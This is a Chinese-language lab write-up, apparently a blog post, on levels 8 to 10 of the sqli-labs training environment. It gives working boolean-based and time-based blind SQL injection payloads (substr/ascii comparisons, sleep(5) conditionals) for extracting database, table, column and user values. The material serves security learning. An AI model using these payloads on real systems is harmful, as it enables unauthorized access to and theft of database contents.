sqli labs闖關筆記 less8 10 盲注

一、布林型盲注，布林盲注與less6思路一致。

1、查詢注入點

輸入單引號，you are in消失，證明存在注入點。

找到閉合引數的方法，單引號後面直接加注釋，you are in出現，證明閉合方式正確。

2、猜資料庫名

' and left((select database()),1)='s'--

3、猜表名

' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>100--

4、猜欄位

' and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --

5、猜字段的值

' and ascii(substr((select username from security.users limit 1,1),1,1)) >1 --

二、時間型盲注

當存在注入漏洞時，可以使用延遲注入進行判斷，此時若存在漏洞，則睡眠5s之後再返回結果。if(condition,a,b)如果條件condition為true，則執行語句a，否則執行b

1. ' and sleep(5) -- 使用延遲的方法判斷是否存在注入漏洞。當然判斷是否存在注入漏洞的方法很多。

2. ' and if(length(database()) = 8,1,sleep(5)) -- 當為8的時候很快載入，而為其他值得時候載入較慢（5s左右），那就說明此時資料庫的長度就是8（security）

3. ' and if(ascii(substr((select database()),1,1)) >113,1,sleep(5)) -- 如果當前資料庫的第乙個字母的ascii值大於113的時候，會立刻返回結果，否則執行5s。

4. ' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>112,1,sleep(5)) -- 同理判斷資料庫中的第5個資料庫的第一位的ascii的值是不是大於112（實際中是115），如果是的則速度返回，否則延時5s返回結果。

5. 其餘步驟與法一基本類似，可以採用burpsuite或者是sql盲注指令碼使用。

less9只能用基於時間的盲注查詢注入點了。

1、查詢注入點

輸入單引號、雙引號、單引號+括號等方式頁面都沒有任何反應，嘗試使用基於時間的盲注來進行注入點判斷。

加入sleep函式，介面會反應5秒，證明注入點存在。

增加sleep函式後用時較長

2、通過返回時間進行判斷，此時如果資料庫長度為8，則可以較快返回。

' and if(length(database())=8,1,sleep(5)) --

3、使用下屬方法逐步猜解資料庫名、資料庫表名、資料庫欄位等。

' and if(ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>1,1,sleep(5)) --

less10與less9一樣，只是基於雙引號，不再贅述。

判斷注入點，介面會反應5秒，證明注入點存在。

" and sleep(5)--

sqli labs闖關筆記 less8 10 盲注

Sqli Labs闖關更新中

sqli labs闖關之61 65關

Sqli labs 學習筆記

sqli labs闖關筆記 less8 10 盲注

Sqli Labs闖關 更新中

sqli labs闖關之61 65關

Sqli labs 學習筆記

相關推薦

Sqli Labs闖關更新中